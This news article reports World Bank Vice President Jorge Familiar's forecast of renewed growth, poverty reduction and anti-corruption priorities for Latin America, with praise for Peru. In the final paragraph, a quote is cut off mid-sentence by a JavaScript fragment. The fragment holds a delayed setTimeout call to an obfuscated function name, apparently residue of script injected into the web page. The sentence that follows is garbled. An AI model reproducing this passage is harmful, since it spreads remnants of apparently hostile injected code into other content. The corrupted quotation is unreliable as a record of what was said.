World Bank announces growth season for Latin America

Updated: Nov 18, 2020

The Vice President of the World Bank (WB) for Latin America and the Caribbean stated that high levels of growth will return to the region.

Speaking to the EFE agency, in the context of the Peru-OECD Forum 2016, Jorge Familiar stated that the years of economic recession are close to an end and that they will be replaced by a period of guaranteed economic growth. For the head of the BM, although the next rise will be incomparable to that of the “golden era”, from the years 2000-2010, in which there was a boom in raw materials, the development that is expected is undoubtedly notable.
The World Bank’s Latin American agenda defined as a priority the assistance to countries in the region, in the process of adapting to the new economic context and, to this end, regional integration is necessary in order to promote global integration. This development will be based on the promotion of inclusive growth, which involves reactivating the process of social transformation. In this context, Familiar stated that the World Bank’s objective will be achieved: the Latin American middle class will finally surpass the poor population in numbers.
To this end, a social protection program will be carried out, which aims to integrate beneficiaries into the productive structure. In this context, private sector investment will be decisive, but also the promotion of public-private initiatives, in order to enhance the development of infrastructures.
Social sustainability thus represents, for the current presidency of the World Bank, a subject of the greatest relevance. Furthermore, according to Jorge Familiar’s statements, it is urgent to prioritize issues such as transparency and accountability in the political process, but also a policy of “zero tolerance to corruption”.
The Vice-President of the World Bank also declares that “the region is heading in the right direction”, adding()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)} I give special praise to Peru which, according to Familiar, has been quite successful in the process of reducing poverty and social transformation in the country.
